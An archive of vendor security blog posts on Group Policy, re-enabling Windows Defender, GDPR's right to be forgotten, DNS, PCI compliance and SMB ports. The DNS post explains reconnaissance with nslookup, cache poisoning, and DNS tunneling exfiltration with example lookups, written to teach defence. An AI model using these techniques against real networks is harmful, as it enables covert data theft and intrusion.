All posts by Jeff Petters

Group Policy Editor Guide: How to Configure and Use

group policy editor

The Group Policy Editor is a Windows administration tool that allows users to configure many important settings on their computers or networks. Administrators can configure password requirements, startup programs, and define what applications or settings other users can change on their own. This blog will deal mostly with the Windows 10 version of Group Policy Editor (gpedit), but you can find it in Windows 7, 8, and Windows Server 2003 and later.

5 Ways to Access Local Group Policy Editor

There are plenty of different ways to get to the Local Group Policy Editor. You can find one that you are most comfortable with.

Open Local Group Policy Editor in Run

  • Open Search in the Toolbar and type Run, or select Run from your Start Menu.
  • Type ‘gpedit.msc’ in the Run command and click OK.

Open Local Group Policy Editor in Search

  • Open Search on the Toolbar
  • Type ‘gpedit’ and click ‘Edit Group Policy.’

Open Local Group Policy Editor in Command Prompt

  • From the Command Prompt, type ‘gpedit.msc’ and hit ‘Enter.’

Open Local Group Policy Editor in PowerShell

  • In PowerShell, type ‘gpedit’ and then ‘Enter.’

If you would prefer you can also use PowerShell to make changes to Local GPOs without the UI.

Open Local Group Policy Editor in Start Menu Control Panel

  • Open the Control Panel on the Start Menu.
  • Click the Windows icon on the Toolbar, and then click the widget icon for Settings.
  • Start typing ‘group policy’ or ‘gpedit’ and click the option to ‘Edit Group Policy.

ways to access group policy editor

Components of the Local Group Policy Editor

Now that you have gpedit up and running, there are a few important details to know about before you start making changes. Group policies are hierarchical, meaning that a higher-level group policy – like a domain level Group Policy – can override local policies.

Group policies are processed in the same order for each login – Local policies first, then Site level, then Domain, then Organizational Unit (OU). OU policies will override all others, and so on down the chain.

There are two major categories of group policies – Computer and User – that are in the left pane of the gpedit window.

Computer Configuration: These policies apply to the local computer, and do not change per user.

User Configuration: These policies apply to users on the local machine, and will apply to any new users in the future, on this local computer.

Those two main categories are further broken down into sub-categories:

Software Settings: Software settings contain software specific group policies: this setting is empty by default.

group policy editor software settings

Window Settings: Windows settings contain local security settings. You can also set login or administrative scripts to execute changes in this category.

group policy editor window settings screenshots

Administrative Templates: Administrative templates can control how the local computer behaves in many ways. These policies can change how the Control Panel looks, what printers are accessible, what options are available in the start menu, and much more.

administrative template screenshot group policy editor

What Can You Do With Group Policy Editor

A better question would be what can’t you do with gpedit! You can do anything from set a desktop wallpaper to disable services and remove Explorer from the default start menu. Group policies control what version of network protocols are available and enforce password rules. A corporate IT security team benefits greatly by setting up and maintaining a strict Group Policy. Here are a few examples of good IT security group policies:

  • Disable removable devices like USB drives.
  • Disable TLS 1.0 to enforce usage of more secure protocols.
  • Limit the settings a user can change using Control Panel. Let them change screen resolution, but not the VPN settings.
  • Specify a good company sanctioned wallpaper, and turn off the user’s ability to change it.
  • Keep users from accessing gpedit to change any of the above settings.

That is just a few examples of how an IT security team could use Group Policies. If the IT team sets those policies at the OU or domain level, the users will not be able to change them without administrator approval them.

How to Configure a Security Policy Setting Using the Local Group Policy Editor Console

Once you have an idea of what you GPOs you want to set, using gpedit to make the changes is pretty simple.

Let’s look at a quick password setting we can change:

1. In gpedit, click Windows Settings, then Account Settings, then Password policy settings2. Select the option for “Password must meet complexity requirements.”password must meet requirements3. If you have Administrative rights to change this setting, you could click the button next to “Enable” and then click Apply. (ed. Varonis has a very solid IT security policy, because of course)

How to use PowerShell to Administer Group Policies

Many sysadmins are moving to PowerShell instead of the UI to manage group policies. Here are a few of the PowerShell grouppolicy cmdlets to get you started.

powershell group policy cmdlets

  • New-GPO: This cmdlet creates a new unassigned GPO. You can pass a name, owner, domain, and more parameters to the new GPO.
  • Get-GPOReport: This cmdlet returns all or the specified GPO(s) that exist in a domain in an XML or HTML file. Very useful for troubleshooting and documentation.
  • Get-GPResultantSetOfPolicy: This cmdlet returns the entire Resultant Set of Policy (RsoP) for a user or computer or both and creates an XML file with the results. This is a great cmdlet to research issues with GPOs. You might think that a policy is set to a certain value, but that policy could be overwritten by another GPO, and the only way to figure that out is to know the actual values applied to a user or computer.
  • Invoke-GPUpdate: This cmdlet allows you to refresh the GPOs on a computer, it’s the same as running gpupdate.exe. You can schedule the update to happen at a certain time on a remote computer with the cmdlet, which also means you can write a script to push out many refreshes if the need arises.

There are many more cmdlets in the ‘grouppolicy’ PowerShell object, but these four are especially useful to track down and resolve inheritance issues with GPOs.

PowerShell is one of a hacker’s favorite tools, and one of their favorite tricks is to enable the local administrator account that you have carefully disabled to gain control of a system for more infiltration or privilege escalation work.

BIt’s important to monitor Active Directory for any changes made to Group Policy – often these changes are the first signals in APT attacks, where hackers intend to be in your network for a while, and they want to remain hidden. Varonis monitors and correlates current activity against normalized behavior and advanced data security threat models to detect APT attacks, malware infections, brute-force attacks, including attempts to change GPOs.

Check out this PowerShell course by Adam Bertram for more PowerShell tips and tricks! It’s worth 3 CPE credits!

Windows Defender Turned Off by Group Policy [Solved]

hero image for windows defender post

Picture this scenario: You log into your computer on any random Thursday, and Windows Defender won’t start. You manually kick it off, and you get the message “Windows Defender is turned off by group policy.”

Could it be that you’re hacked?

Attackers know Windows Defender can detect cyberattacks, so as part of their standard playbook they attempt to disable Defender. Sometimes they could use group policy to disable Windows Defender on multiple machines – depending on their level of access – so they can move more easily between several computers on your network. Sometimes they will use a local group policy to disable Defender. There are other methods attackers use to disable Defender, but the group policy method makes it more difficult for the user to re-enable it.

5 Solutions for Windows Defender Turned Off by Group Policy

If you experience or one of your user’s reports this kind of error, you have several options to re-enable Defender. As a security practitioner, you might want to check several of these settings and a few other items (i.e., malware, AD event logs, ) for evidence of tampering.

Solution 1: Using Group Policy

  1. Open Group Policy editor
  2. Select Local Computer Policy -> Administrative Templates -> Windows Components
    local group policy editor screenshot
  3. Select Windows Defender and in the right panel and double click the setting “Turn off Windows Defender”
    local group policy editor illustrated screenshot
  4. “Turn off Windows Defender” should be set to Enable if you can’t run Windows Defender. You want to disable this option. You will need local administrative rights to make this change
    turn off windows defender screenshot

You should be able to run Windows Defender after you update this GPO.

Solution 2: User Settings

Another option to re-enable Windows Defender is in the Control Panel Settings.

  1. Click the Start button and type Windows Defender, and double click the icon for Windows Defender Security Center – this might be slightly different depending on your version of Windows.
  2. Click Settings, you are looking for a button labeled “Real Time Protection.” Make sure it is on.
    user settings screenshot

Solution 3: Using the Command Line

Another solution is to run the following command from PowerShell – make sure to Run As Administrator.

Set-MpPreference -DisableRealtimeMonitoring 0

Solution 4: Using the Registry Editor

Editing the Registry is another possible fix for this issue.

  1. Run ‘regedit’
  2. Navigate through the tree to “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender.”
  3. Delete DisableAntiSpyware in the right pane.
  4. Navigate to “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection.”
  5. Delete DisableRealtimeMonitoring in the right pane.

People report that sometimes the first one works, sometimes the second, sometimes both. Best to delete both to be sure.

Solution 5: Reviewing Conflicting Programs

It is possible that attackers turned off Windows Defender by some other means and not from direct tampering with computer settings. You may have to investigate further to get everything back up and running.

Check for Malware

Malware can turn off Defender and keep it off despite your best efforts to re-enable it. If you aren’t able to turn Defender back on you might be infected. Install and run another malware detector of your choice and see if you can find and remove the infection.

Another option is to do what Varonis ITSec does and reinstall the OS.

Check Third-Party Antivirus Tools

If none of the other solutions work, make sure if you have another anti-virus application installed that it works with Windows Defender. Some anti-virus programs don’t. Some EDR solutions do.

Windows Defender is a good line of defense in a layered security strategy, but it is relatively easy for attackers to work-around. Just as easily as you can turn it on, they can turn it back off.

solutions for windows defender turned off by group policy

Varonis provides monitoring, perimeter telemetry, and advanced data security analytics for detecting intrusions and attackers even when they attempt to hide by turning off Windows Defender. Varonis monitors changes to GPOs and will throw an alert anytime someone changes a GPO. Varonis also detects attackers that connect from new network connections in strange geolocations and attempt to steal or escalate privileges.

Want to see how Varonis protects you from attack? Sign up for a free Live Cyber Attack Workshop right now!

Right to be Forgotten: Explained

right to be forgotten hero

The “Right to be Forgotten” (RTBF) is a key element of the new EU General Data Protection Regulation (GDPR), but the concept pre-dates the latest legislation by at least five years.  It encompasses the consumers’ rights to request that all personal data held by the company —or “controller” in GDPR-speak — be removed on request.  But it goes further: the GDPR rules (see its article 17 ) says that search engines (like Google) have to delete references to personal data that comes up publically in search results.

In other words, consumers have the right to retain their privacy on the Internet.  The notion of RTBF is beginning to become more common all around the world. California recently passed RTBF in the California Consumer Privacy Act. North Carolina is working on RTBF laws, and there are early efforts to bring the issue before the US Congress.

All that to say: RTBF looks to be a new “normal” in the coming years.

Editor’s note: The Right to be Forgotten, Right to Erasure, and Right to Delete are conceptually similar enough that we are going to simply call them all Right to be Forgotten for this blog.

Right to Be Forgotten History

The RTBF as a concept grew out of the long held belief that after a certain amount of time, a person’s past should not be regarded when they seek employment. With the advent of the internet and indexed search engines (like Google), those types of records became more accessible.

Time for a quick history lesson: In 2014, the Spanish judiciary ruled in favor of a right to be forgotten in the case Google Spain SL, Google Inc v Agencia Española de Protección de Datos, Mario Costeja González (2014). The case revolved around a newspaper announcement in La Vanguardia for Costeja’s forced property sale required to settle social security debt in 1998. In 2009, Costeja contacted the newspapers because searching for his name brought up the old announcement. The newspaper denied the request since it was a government ordered publication. Costeja then contacted Google Spain to remove the search result.

Eventually, the EU courts ruled that Google needed to remove the search results, but – and this is important – the newspaper didn’t have to remove the original article. The ruling effectively established precedence and validated RTBF as law, with several caveats.

Today, RTBF is enshrined in the GDPR’s article 17.  And the RTBF has reached US’s shores as the Right to Erasure, which is now law in California.

Can I Ask a Company to Delete My Data?

In general, if you are in a jurisdiction where RTBF or similar laws exist you can submit a Data Subject Access Request (DSAR) to remove or request what personal data about you a company has stored. That doesn’t mean the data controller would or should fulfill every DSAR.  There are legal differences between public, private, and erroneous data to consider.

When is the Right to Be Forgotten Applicable?

First, you need to make the request directly with the data collector that holds the data that you want deleted. Google has a specific request form for this, Facebook another, and so on.

The “data controller,” the entity that currently has the data you want removed, then must consider your request based on legal precedents. Some valid reasons for RTBF request include:

  1. Data exists on the internet that is old and outdated, or otherwise not currently relevant
  2. The data subject decides that the data controller no longer have the right to access their data, and the data isn’t in the public domain
  3. Someone stole the data or changed the data
  4. A judge or other judicial body ruled this data deleted

reasons for a right to be forgotten request

In short, the “data subject” – the person making the request – has a strong legal framework to demand that data controllers must erase their personal data in many instances. For example, blatantly false or abusive data has a good case for erasure. There are, of course, exceptions.

Are There Exceptions to the Right to Be Forgotten?

There are several exceptions to RTBF:

  1. The data should be available because of freedom of information or expression.
  2. The data is part of an active or recent legal proceeding.
  3. The data is of importance to public health.
  4. The data should be archived for public interest because it is significant to scientific or historical research.

For the most part, exceptions to the RTBF revolve around public interest, freedom of speech, and freedom of information.

Controversy Regarding the Right to Be Forgotten

Not surprisingly, RTBF is controversial with compelling arguments on both sides of the issue. On one hand, you have an individual’s right to privacy, and on the other, you have freedom of speech and freedom of information.

The controversy boils down to where does one draw the line between the two? In the previously mentioned Costeja case, that line was the search result. The factual information that Costeja sold the property to settle debt is a matter of public record, and should not be deleted from the internet. However, the courts ordered Google to delete and suppress the search result that linked to the public information that Costeja sold the property. The ruling says that since Costeja repaid the debt  long ago, the search results are “inadequate, irrelevant, or excessive.” The court granted Costeja RTBF based on those grounds but stopped short of saying any data deletion request must be granted.

Recently, France brought a case to the European Court of Justice that requests the GDPR’s RTBF extend universally to people outside the EU. Critics, including Google, argue that ruling in favor to extend RTBF might result in global censorship and infringement of freedom of information rights.

On the other side, France says that if RTBF isn’t universal then the Google search result will still show up in other countries – rendering the protection of RTBF effectively useless. If Google deletes the result from, anyone could just use the U.S version of Google to see the same result.

The question of where to draw that line between Right to Privacy and Freedom of Information is not going away. Stay tuned as lawmakers, lawyers, and judges make new rules and verdicts – it’s a fascinating discussion.

Right to Be Forgotten in The News

The Recent News is All About Google v France

Canada’s Privacy Commissioner Asked the Courts to Rule on Right to be Forgotten

A UK Charity Asks Courts to Grant RTBF to Childhood Cancer Survivors

The Right to be Forgotten is going to prove to be a tricky rule for organizations to navigate as more guidelines are developed and evolved. Each organization needs a strategy in place to manage an RTBF request based on the data that you save and the applicable RTBF laws.

how to manage an RTBF request

Companies need to:

Varonis DatAnswers creates an index of your data and helps identify files that contain data subject identifiers, enabling companies to process each DSAR appropriately. Unstructured data can contain millions of dollars’ worth of potential fines if a data controller mishandles a DSAR and the customer’s data gets shared or reused again. The Varonis Data Transport Engine can then help move, collect, and secure all of those files into one single location, so that you can easily quarantine or delete the data – and more easily comply with RTBF.

Want to talk to one of our GDPR experts about how Varonis helps you manage DSARs and Right to be Forgotten? Get a free 1:1 demo and ask about GDPR.

What is DNS, How it Works + Vulnerabilities

DNS domain name system

The Domain Name System (DNS) is the internet’s version of the Yellow Pages. Back in the olden times, when you needed to find a business’ address, you looked it up in the Yellow Pages. DNS is just like that, except you don’t actually have to look anything up: your internet connected computer does that for you. It’s how your computer knows how to find Google, or, or

For two computers to communicate on an IP network, protocol dictates that they need an IP address. Think of an IP address like a street address – for one computer to “locate” another, they need to know the other computer’s number. Since most humans are better at remembering names – – than numbers –, they needed a program for computers to translate names into IP addresses.

The program to translate names into numbers and vice versa is called, “DNS,” or Domain Name System, and computers that run DNS are called, “DNS servers.” Without DNS, we’d have to remember the IP address of any server we wanted to connect to – no fun.

How DNS Works

DNS is such an integral part of the internet that it’s important to understand how it works.

Think of DNS like a phone book, but instead of mapping people’s names to their street address, the phone book maps computer names to IP addresses. Each mapping is called a “DNS record.”

The internet has a lot of computers, so it doesn’t make sense to put all the records in one big book. Instead, DNS is organized into smaller books, or domains. Domains can be very large, so they are further organized into smaller books, called, “zones.”  No single DNS server stores all the books – that would be impractical.

Instead, there are lots of DNS servers that store all the DNS records for the internet. Any computer that wants to know a number or a name can ask their DNS server, and their DNS server knows how to ask – or query – other DNS servers when they need a record. When a DNS server queries other DNS servers, it’s making an “upstream” query. Queries for a domain can go “upstream” until they lead back to domain’s authority, or “authoritative name server.”

An authoritative name server is where administrators manage server names and IP addresses for their domains. Whenever a DNS administrator wants to add, change or delete a server name or an IP address, they make a change on their authoritative DNS server (sometimes called a “master DNS server”). There are also “slave” DNS servers; these DNS servers hold copies of the DNS records for their zones and domains.

how DNS works

The Four DNS Servers that Load a Webpage

  • DNS recursor: The DNS recursor is the server that responds to a DNS query and asks another DNS server for the address, or already has the IP address for the site saved.
  • Root name server:A root name server is the name server for the root zone. It responds to direct requests and can return a list of authoritative name servers for the corresponding top-level domain.
  • TLD name server: The top-level domain server (TLD) is one of the high-level DNS servers on the internet. When you search for, a TLD server for the ‘.com’ will respond first, then DNS will search for ‘varonis.’
  • Authoritative name server: The authoritative name server is the final stop for a DNS query. The authoritative name server has the DNS record for the request.

Types of DNS Service

There are two distinct types of DNS services on the internet. Each of these services handles DNS queries differently depending on their function.

  • Recursive DNS resolver: A recursive DNS resolver is the DNS server that responds to the DNS query and looks for the authoritative name server or a cached DNS result for the requested name.
  • Authoritative DNS server: An authoritative DNS server stores the DNS request. So if you ask an authoritative DNS server for one of its IP addresses, it doesn’t have to ask anyone else. The authoritative name server is the final authority on those names and IP addresses.

Public DNS and Private DNS

DNS was created so people could connect to services on the internet.  For a server to be accessible on the public internet, it needs a public DNS record, and its IP address needs to be reachable on the internet – that means it’s not blocked by a firewall. Public DNS servers are accessible to anyone that can connect to them and don’t require authentication.

Interestingly, not all DNS records are public. Today, in addition to allowing employees to use DNS to find things on the internet, organizations use DNS so their employees can find private, internal servers. When an organization wants to keep server names and IP addresses private, or not directly reachable from the internet, they don’t list them in public DNS servers. Instead, organizations list them in private, or internal DNS servers – internal DNS servers store names and IP addresses for internal file servers, mail servers, domain controllers, database servers, application servers, etc. – all the important stuff.

Something to remember – like external DNS servers, internal DNS servers don’t require authentication. That’s because DNS was created long ago, when security wasn’t such a big concern. Most of the time, anyone on the inside of the firewall – by infiltration or connected through a VPN – can query internal DNS servers. The only thing that prevents someone “outside” from accessing and querying internal DNS servers is that they can’t connect to them directly.

  • Public DNS: For a server to be accessible on the public internet, it needs a public DNS record, and its IP address needs to be reachable on the internet.
  • Private DNS: Computers that live behind a firewall or on an internal network use a private DNS record so that local computers can identify them by name. Outside users on the internet will not have direct access to those computers.

7 Steps in a DNS Lookup

Let’s look at exactly how a DNS request works.

  1. A DNS request starts when you try to access a computer on the internet. For example, you type in your browser address bar.
  2. The first stop for the DNS request is the local DNS cache. As you access different computers, those IP addresses get stored in a local repository.  If you visited before, you have the IP address in your cache.
  3. If you don’t have the IP address in your local DNS cache, DNS will check with a recursive DNS server. Your IT team or Internet Service Provider (ISP) usually provides a recursive DNS server for this purpose.
  4. The recursive DNS server has its own cache, and if it has the IP address, it will return it to you. If not, it will go ask another DNS server.
  5. The next stop is the TLD name servers, in this case, the TLD name server for the .com addresses. These servers don’t have the IP address we need, but it can send the DNS request in the right direction.
  6. What the TLD name servers do have is the location of the authoritative name server for the requested site. The authoritative name server responds with the IP address for and the recursive DNS server stores it in the local DNS cache and returns the address to your computer.
  7. Your local DNS service  gets the IP address and connects to to download all the glorious content. DNS then records the IP address in local cache with a time-to-live (TTL) value. The TTL is the amount of time the local DNS record is valid, and after that time, DNS will go through the process again when you request the next time.

What are Types of DNS Queries?

DNS queries are the computer code that tells the DNS servers what kind of query it is and what information it wants back. There are three basic DNS queries in a standard DNS lookup.

  • Recursive query: In a recursive query the computer requests an IP address or the confirmation that the DNS server doesn’t know that IP address.
  • Iterative query: An iterative query the requester asks a DNS server for the best answer it has. If the DNS server doesn’t have the IP address, it will return the authoritative name server or TLD name server. The requester will continue this iterative process until it finds an answer or times out.
  • Non-recursive query: A DNS resolver will use this query to find an IP address that it doesn’t have in its cache. These are limited to a single request to limit network bandwidth usage.

types of DNS queries

What is DNS Cache + Caching Functions

DNS cache is a repository of domain names and IP addresses that are stored on a computer, so it doesn’t have to ask for the IP address every time. Imagine if every time any user tried to go to DNS had to query the authoritative name server at Varonis. The traffic would be overwhelming! The very thought of that much traffic is why we have DNS caching. DNS caching has two major goals:

  • Speed up DNS requests
  • Reduce bandwidth of DNS requests across the internet

The DNS cache methodology does have some issues, however:

  • DNS changes need time to propagate – meaning it could be a while before every DNS server has their cache updated to latest IP data
  • DNS cache is a potential attack vector for hackers

There are a few different types of DNS caching used on the internet:

  • Browser DNS caching: Current browsers circa 2018 have built in DNS caching functionality. Resolving a DNS with the local cache is fast and efficient.
  • Operating System (OS) DNS caching: Your computer is a DNS client, and there is a service on your computer that manages DNS resolution and requests. This DNS cache is also local and therefor fast and requires no bandwidth.
  • Recursive resolving DNS caching: Each DNS recursor has a DNS cache, and it stores any IP address that it knows to use for the next request

DNS Weaknesses and Vulnerabilities

There are three major vulnerabilities with DNS to watch out for, which attackers often exploit to abuse DNS:

  1. Internal DNS servers hold all the server names and IP addresses for their domains and will share them with anyone that asks. This makes DNS a great source of information for attackers when they’re trying to do internal reconnaissance.
  2. DNS caches aren’t “authoritative, and they can be manipulated. If your DNS server is “poisoned” with bad records, computers can be fooled into going to bad places.
  3. DNS relays query information from internal workstations to outside servers, and attackers have learned how to use this behavior to create “covert channels” to exfiltrate data.

DNS weaknesses and vulnerabilites

Use DNS for Reconnaissance

Once an attacker is inside a firewall and has control of a computer, they can use DNS to find important server names. Attackers can lookup up names that are associated with internal IP addresses – mail servers, name servers – all sorts of valuable stuff. If they’re savvy enough, they can even get an internal DNS server to send over lots of information about their domain’s zones – this is called a “DNS zone transfer attack.”

If you have a Windows computer, run the following commands as is; if you are Linux user, there are corresponding commands you can look up.

  1. Open up a command prompt (type Ctrl + esc, the letters “cmd,” then enter).
  2. Type ipconfig
  3. You’ll see the DNS domain you’re in (Connection-specific DNS Suffix), your IP address, and a bunch of other stuff. You will want to refer back to this.
  4. Type nslookup [ip address]  You’ll see the name of the DNS server that’s responding, and, if the name is known, the DNS record listing the name and IP address.
  5. nslookup –type=soa [your domain] This command returns your authoritative DNS server, wouldn’t that be handy if you were trying to infiltrate a network.
  6. nslookup –type=MX [your domain] That command returns all of the mail servers on your local domain, just in case you wanted to hack mail servers and didn’t know where they were.

Use DNS to Redirect Traffic

Remember, when a user tries to browse to a website, their computer queries its DNS server for the IP address of the site, or DNS record. If the DNS server has a cached copy of the record, it replies. If not, it queries an “upstream” DNS server, relays the results back to the end user, and caches them for next time.

Attackers have figure out a way to spoof DNS responses or make responses look like they’re coming from legitimate DNS servers. Without getting overly technical, attackers take advantage of three weaknesses in DNS to do this:

  1. DNS performs very weak validation on responses coming from upstream servers. Responses just need to contain the right transaction ID, which is just a 16-bit number (0-65536). Just as it turns out that you don’t need that many people in a room for the odds to favor two of them having the same birthday, it turns out that it’s easier to guess the right ID than you might think.
  2. DNS servers accept simultaneous (or near-simultaneous) responses to their requests, allowing attackers to make multiple guesses about the transaction ID, (which is little like a brute force attack against a password).
  3. The IP connections used by DNS are easy to “spoof.” That means an attacker can send traffic to a DNS server from one computer and make it look like it’s coming from another computer, like a valid DNS server. Only certain kinds of IP connections are easy to spoof – DNS happens to be one of them.

If an attacker successfully spoofs a DNS response, they can make the receiving DNS server cache a poisoned record. So how does that help the attackers?

Here’s an example: Let’s say an attacker learns that your organization uses an external application for something important, like expenses. If they poison your organization’s DNS server so that it sends each user to the attacker’s server, all they need to do is create a legitimate looking login page, and users will enter their credentials. They might even relay the traffic to the real server (acting as a “man in the middle”), so no one notices. The attacker can then try those credentials on other systems, sell them or just celebrate with an evil laugh.

Use DNS as a Covert Channel

Let’s say an attacker has managed to get inside a network (, compromised a host or two, and found critical data that they want to exfiltrate. How can they do that without setting off any alarms? Attackers use a technique called “DNS tunneling” to do just that. They set up a DNS domain (, for example) on the internet and create an authoritative name server. Then, on the compromised host, the attacker can use a program that breaks up the data into small chunks and inserts it into a series of lookups, like so:

  • nslookup
  • nslookup
  • nsllookup

The DNS server will receive these requests, realize the results aren’t in its cache, and relay those requests back to’s authoritative name server. The attacker is expecting this traffic, so it runs a program on the authoritative name server to extract the first part of the query (everything before and reassemble it. Unless the organization is inspecting the queries its DNS servers make, they may never realize their DNS servers were used to exfiltrate data.

DNS has been around for a long time, and every computer connected to the internet relies on it. Attackers now use DNS for both external and internal reconnaissance, to hijack traffic and to create covert communication channels. Luckily, by monitoring DNS servers and applying security analytics, many of these attacks can be detected and thwarted.

Want to see how?  Join our Live Cyber Attack Workshops as our security engineers execute a live attack – and exfiltrate data via DNS tunneling and see it all in real time!

What is PCI Compliance: Requirements and Penalties

PCI compliance

PCI compliance is a set of standards and guidelines for companies to manage and secure credit card related personal data. The major credit card companies – Visa, Mastercard, and American Express – established Payment Card Industry Data Security Standards (PCI DSS) guidelines in 2006 in an effort to protect credit card data from theft.

Experts say credit card fraud costs businesses billions of dollars each year in the United States. It should be obvious that cybercriminals are currently winning the war on credit cards. Protecting customer data and payment information needs to be a priority for consumers, businesses, and banks so we can stop wasting billions of dollars on credit card fraud. Understanding and leveling-up your PCI compliance capability is a major part of winning the war.

Why is PCI Compliance Important for Businesses to Follow?

PCI DSS compliance should be one of the most important ongoing projects in any business that stores and saves customer’s private credit card data. According to the 2018 Verizon Payment Security Report, only 52.5% of all organizations are 100% PCI compliant, and just 39.7% of companies in the Americas. We can do better!

Verizon’s research shows a correlation between companies that experienced a data breach and missing PCI DSS controls. In short: breached companies didn’t follow all of the requirements, which shocks no one.

More importantly, following the PCI DSS helps you keep compliant with data security and privacy laws, such as the General Data Protection Regulation (GDPR) or the Gramm-Leach-Bliley Act (GLBA). PCI DSS represents good data security practices for any organization to follow.

How Do You Become PCI Compliant?

PCI DSS is the roadmap you need to follow to become PCI compliant. PCI DSS is a 12-step plan to protect customer data.

goals of PCI DSS compliance

12 PCI DSS Requirements

Goals Requirements
Build and Maintain a Secure Network and Systems Requirement 1: Install and maintain a firewall configuration to protect cardholder data
Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters
Protect Cardholder Data Requirement 3: Protect stored cardholder data
Requirement 4: Encrypt transmission of cardholder data across open, public networks
Maintain a Vulnerability Management Program Requirement 5: Protect all systems against malware and regularly update anti-virus software or programs
Requirement 6: Develop and maintain secure systems and applications
Implement Strong Access Control Measures Requirement 7: Restrict access to cardholder data by business need to know
Requirement 8: Identify and authenticate access to system components
Requirement 9: Restrict physical access to cardholder data
Regularly Monitor and Test Networks Requirement 10: Track and monitor all access to network resources and cardholder data
Requirement 11: Regularly test security systems and processes
Maintain an Information Security Policy Requirement 12: Maintain a policy that addresses information security for all personnel

How Much Does It Cost To Get PCI Compliant?

The answer to this question is complicated.

The cost to be PCI compliance is a pittance compared to the cost of a data breach.

PCI compliance is simply good data security practice and isn’t much different than the NIST or SANS security controls. Think of the cost of PCI compliance more like the “cost of good data security practices” and then make your calculations accordingly.

How Do I Validate My PCI Compliance?

Each credit card company has their own compliance validation levels that they need to adhere to. Either you can perform your own PCI Compliance Self-Assessment Questionnaire (SAQ), or you can contract with a certified PCI Quality Security Assessor (QSA).

PCI Compliance Qualified Security Assessors (QSA)

PCI QSAs are certified and trained to perform PCI security assessments. Different QSAs will be more familiar with one business or another, so if you do go this route make sure to find one that understands your business needs.

PCI Compliance Self-Assessment Questionnaire (SAQ)

The other option is to complete the SAQ, which is a series of yes or no questions to determine your level of compliance with the PCI DSS. Each organization performs the SAQ and submits their quarterly reports to their required organizations.

How Do I Maintain My PCI Compliance?

In order to maintain PCI compliance, you must also engage with PCI compliant credit card processors and banks. The data you protect only matters if that data remains protected across the entire transaction life cycle.

First, you need to employ good data security practices inside your organization and have regular internal audits and quality monitoring of your PCI compliant data. Here are some specific controls you can implement that will help protect your PCI data.

maintain PCI compliance

  • Discover and Classify Sensitive Data
    • Locate and secure all sensitive data
    • Classify data based on business policy
  • Map Data and Permissions
    • Identify users, groups, folder and file permissions
    • Determine who has access to what data
  • Manage Access Control
    • Identify and deactivate stale users
    • Manage user and group memberships
    • Remove Global Access Groups
    • Implement a least privilege model
  • Monitor Data, File Activity, and User Behavior
    • Audit and report on file and event activity
    • Monitor for insider threats, malware, misconfigurations and security breaches
    • Detect security vulnerabilities and remediate

Penalties for PCI Compliance Violations

According to the primary PCI Compliance Blog, fines are not published or reported, and usually end up passed to the merchants. Banks pass the fines along as increased transaction fees or termination of business relationships.

Fines vary from $5,000 to $100,000 per month until the merchants achieve compliance. That kind of fine is manageable for a big bank, but it could easily put a small business into bankruptcy.

But, these fines issued by the PCI are small in comparison to credit monitoring fees, laws suits, and actions by state and federal governments that can result when you’re not truly PCI DSS compliant.   For example, Target said the total cost of their massive breach of credit card data was over $200 million, which included an $18.5 million legal settlement with 47 state attorneys general.

The Varonis Data Security Platform provides the foundation you need to begin your PCI compliance journey. Varonis maps your folders and folder access and scans your files for PCI compliant data. Once you know where your PCI compliance data lives you can work to reduce the risk of breach and then monitor that data for abnormal access patterns. Varonis protects your PCI data for the long term. You can even run data access reports for your PCI compliance audits.

Read more about how Varonis assists you on your compliance journey by downloading our free Compliance and Regulation Guide.

What is an SMB Port + Ports 445 and 139 Explained

smb port hero image

The SMB protocol enables “inter-process communication,” which is the protocol that allows applications and services on networked computers to talk to each other – you might say SMB is one of the languages that computers use to talk to each other.

How Does The SMB Protocol Work?

In early versions of Windows, SMB ran on top of the NetBIOS network architecture. Microsoft changed SMB in Windows 2000 to operate on top of TCP and use a dedicated IP port. Current versions of Windows continue to use that same port.

Microsoft continues to make advancements to SMB for performance and security: SMB2 reduced the overall chattiness of the protocol, while SMB3 included performance enhancements for virtualized environments and support for strong end-to-end encryption.

SMB Protocol Dialects

Just like any language, computer programmers have created different SMB dialects use for different purposes. For example, Common Internet File System (CIFS) is a specific implementation of SMB that enables file sharing. Many people mistake CIFS as a different protocol than SMB, when in fact they use the same basic architecture.

Important SMB implementations include:

  • CIFS: CIFS is a common file sharing protocol used by Windows servers and compatible NAS devices.
  • Samba: Samba is an open-source implementation of Microsoft Active Directory that allows non-Windows machines to communicate with a Windows network.
  • NQ: NQ is another portable file sharing SMB implementation developed by Visuality Systems.
  • MoSMB: MoSMB is a proprietary SMB implementation by Ryussi Technologies.
  • Tuxera SMB: Tuxera is also a proprietary SMB implementation that runs in either kernel or user-space.
  • Likewise: Likewise is a multi-protocol, identity aware network file sharing protocol that was purchased by EMC in 2012.

What Are Ports 139 And 445?

SMB has always been a network file sharing protocol. As such, SMB requires network ports on a computer or server to enable communication to other systems. SMB uses either IP port 139 or 445.

  • Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
  • Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.

smb port 139 and 445

How To Keep These Ports Secure

Leaving network ports open to enable applications to function is a security risk. So how do we manage to keep our networks secure and maintain application functionality and uptime? Here are some options to secure these two important and well-known ports.

  1. Enable a firewall or endpoint protection to protect these ports from attackers. Most solutions include a blacklist to prevent connections from known attackers IP addresses.
  2. Install a VPN to encrypt and protect network traffic.
  3. Implement VLANs to isolate internal network traffic.
  4. Use MAC address filtering to keep unknown systems from accessing the network. This tactic requires significant management to keep the list maintained.

how to keep ports 139 and 445 secure

In addition to the network specific protections above, you can implement a data centric security plan to protect your most important resource – the data that lives on your SMB file shares.

Understanding who has access to your sensitive data across your SMB shares is a monumental task. Varonis maps your data and access rights and discovers your sensitive data on your SMB shares. Monitoring your data is essential to detect attacks in progress and protect your data from breaches. Varonis can show you where data is at-risk on your SMB shares and monitor those shares for abnormal access and potential cyberattacks.  Get a 1:1 demo to see how Varonis monitors CIFS on NetApp, EMC, Windows, and Samba shares to keep your data safe.

Varonis Gets Lightning Fast with Solr

Varonis Gets Lightning Fast with Solr

Any security practitioner that has had to perform forensic analysis on a cybersecurity incident likely describes the process as “searching for a needle in a stack of needles.” Even Tony Stark’s magnet isn’t going to help. Anyone who has used a SIEM or any other monitoring system to figure out how gigabytes of data was stolen knows how difficult that task can be.

